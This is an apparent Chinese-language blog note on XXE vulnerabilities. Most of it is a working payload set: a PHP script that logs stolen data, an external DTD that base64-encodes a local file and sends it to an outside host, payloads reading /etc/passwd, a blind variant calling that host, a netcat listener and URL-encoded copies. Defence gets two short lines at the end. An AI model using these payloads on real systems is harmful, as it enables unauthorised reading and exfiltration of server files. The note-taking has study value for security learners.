前言:
遇到个XXE漏洞,查点资料做个笔记。
在叙述之前说下XML,XML被设计用来传输和存储数据,HTML被设计用来显示数据,XML格式必须严格化。
目录:
0x01:漏洞原理
0x02:攻击代码
0x03:如何防御
0x01 漏洞原理
1:XML可控且后端处理时无过滤(满足这个其实就可以了)
2:XML解析是引用外部实体(默认就可以)
0x02 攻击代码
服务器端:
Get_Xxe.php
<?php //简单的把GET过来的请求追加的保存在本地1.txt文件下 $txt = $_GET['file']; if($txt) { $file = fopen("1.txt","a+"); fwrite($file,"$txt"."\r\n"); print($txt); fclose($file); } ?>
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://www.bywalks.com/Get_Xxe.php?file=%file;'>" > %all;
<?xml version="1.0"?> <!DOCTYPE ANY [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=E:/phpStudy/WWW/1.txt"> <!ENTITY % dtd SYSTEM "http://www.bywalks.com/1.dtd"> %dtd; %send; ]>
//有回显 <?xml version="1.0"?> <!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <x>&xxe;</x> //Blind XXE <?xml version="1.0"?> <!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "http://www.bywalks.com/Get_Xxe.php?file=XXE"> ]> <x>&xxe;</x> 本地NC:nc.exe -lvvp 83 远端访问:<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://IP:83">]><foo>&xxe;</foo> URLEncode:%3c!DOCTYPE+foo+%5b%3c!ENTITY+xxe+SYSTEM+%22http%3a%2f%2fIP%3a83%22%3e%5d%3e%3cfoo%3e%26xxe%3b%3c%2ffoo%3e PAYLOAD:<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://www.bywalks.com/Get_Xxe.php?file=cunzai">]><foo>&xxe;</foo> URLEncode:%3c!DOCTYPE+foo+%5b%3c!ENTITY+xxe+SYSTEM+%22http%3a%2f%2fwww.bywalks.com%2fGet_Xxe.php%3ffile%3ddoudoudou%22%3e%5d%3e%3cfoo%3e%26xxe%3b%3c%2ffoo%3e PAYLOAD:<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo> URLEncode:%3c!DOCTYPE+foo+%5b%3c!ENTITY+xxe+SYSTEM+%22file%3a%2f%2f%2fetc%2fpasswd%22%3e%5d%3e%3cfoo%3e%26xxe%3b%3c%2ffoo%3e file:///etc/passwd php://filter/read=convert.base64-encode/resource=E:/phpStudy/WWW/1.txt
0x03 如何防御
1:禁止引用外部实体,但SSRF还可用
2:过滤<> RNTITY 等(前面已经说过XML是必须严格化,所以过滤这些就无法解析)
[课程]Linux pwn 探索篇!